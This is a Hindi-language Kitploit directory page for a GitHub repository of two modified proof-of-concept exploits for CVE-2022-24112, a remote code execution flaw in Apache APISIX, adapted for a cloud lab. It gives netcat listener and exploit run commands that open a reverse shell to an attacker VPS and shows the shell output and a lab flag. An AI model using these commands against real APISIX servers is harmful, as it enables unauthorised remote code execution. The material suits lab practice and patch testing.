Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-24112_POC — CVE-2022-24112_POC | Kitploit
उपकरण/GitHubGitHub/acczdy/cve-2022-24112_poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगAPI सुरक्षा
GitHubacczdy/cve-2022-24112_poc

CVE-2022-24112_POC

CVE-2022-24112_POC

रिपॉजिटरी देखें
5113 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

POC

एकत्रित POC

CVE-2022-24112

春秋云境:CVE-2022-24112 लैब वातावरण के लिए, दो POC को संशोधित किया गया है, M4xSec और twseptian द्वारा लिखित POC को थोड़ा बदलकर 春秋云境 लैब के अनुकूल बनाया गया:


春秋云境:CVE-2022-24112:

Apache Apisix (अपाचे फाउंडेशन, USA) एक क्लाउड-नेटिव माइक्रोसर्विसेज API गेटवे सर्विस है। यह OpenResty और etcd पर आधारित है, जिसमें डायनामिक रूटिंग और प्लगइन हॉट-लोडिंग की सुविधा है, जो माइक्रोसर्विसेज आर्किटेक्चर में API प्रबंधन के लिए उपयुक्त है। Apache APISIX में एक रिमोट कोड एक्सीक्यूशन कमजोरी पाई गई है, जो batch-requests प्लगइन में उपयोगकर्ता के बैच अनुरोधों को प्रभावी ढंग से सीमित न करने के कारण उत्पन्न हुई है। हमलावर इस कमजोरी के माध्यम से Admin API के IP प्रतिबंध को बायपास कर सकता है, जिससे रिमोट कोड एक्सीक्यूशन हो सकता है।


मूल POC:

  1. M4xSec: https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112/blob/main/apisix-exploit.py

  2. twseptian: https://github.com/twseptian/cve-2022-24112/blob/main/poc/poc2.py

संशोधित POC वे दो हैं जो मैंने ऊपर लिखे हैं, क्रमशः Linux और Windows वातावरण के लिए:


CVE-2022-24112_Linux_by_twseptian.py

  1. VPS पर सुनना शुरू करें: nc -lvvp 18888

  2. POC निर्देशिका में प्रवेश करें और चलाएं:

    ध्यान दें: -t डेटा जोड़ते समय http:// या लिखने की आवश्यकता नहीं है, केवल डोमेन + पोर्ट लिखें, जैसा कि नीचे दिया गया है:

टूल डाउनलोड करें
https://
root@kitploit:~
python3 CVE-2022-24112_Linux_by_twseptian.py -t eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 -L VPS_IP -P VPS_PODRPODR
  • VPS पर वापस जाकर देखें कि निम्नलिखित स्थिति है:

    root@kitploit:~
    [root@root ~]# nc -lvvp 18888
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Listening on :::18888
    Ncat: Listening on 0.0.0.0:18888
    Ncat: Connection from x.x.x.x.
    Ncat: Connection from x.x.x.x:x.
    id
    uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
    cat /flag
    flag{0834f79f-5f40-4389-bce7-c64e969734c4}
    

  • CVE-2022-24112_Windows_by_M4xSec.py

    1. VPS पर सुनना शुरू करें: nc -lvvp 18888

    2. POC निर्देशिका में प्रवेश करें और चलाएं:

      ध्यान दें: -t डेटा जोड़ते समय http:// या https:// लिखने की आवश्यकता नहीं है, केवल डोमेन + पोर्ट लिखें, जैसा कि नीचे दिया गया है:

      root@kitploit:~
      python3 CVE-2022-24112_Windows_by_M4xSec.py eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 VPS_IP VPS_PODRPODR
      
    3. VPS पर वापस जाकर देखें कि निम्नलिखित स्थिति है:

      root@kitploit:~
      [root@root ~]# nc -lvvp 18888
      Ncat: Version 7.50 ( https://nmap.org/ncat )
      Ncat: Listening on :::18888
      Ncat: Listening on 0.0.0.0:18888
      Ncat: Connection from x.x.x.x.
      Ncat: Connection from x.x.x.x:x.
      id
      uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
      cat /flag
      flag{0834f79f-5f40-4389-bce7-c64e969734c4}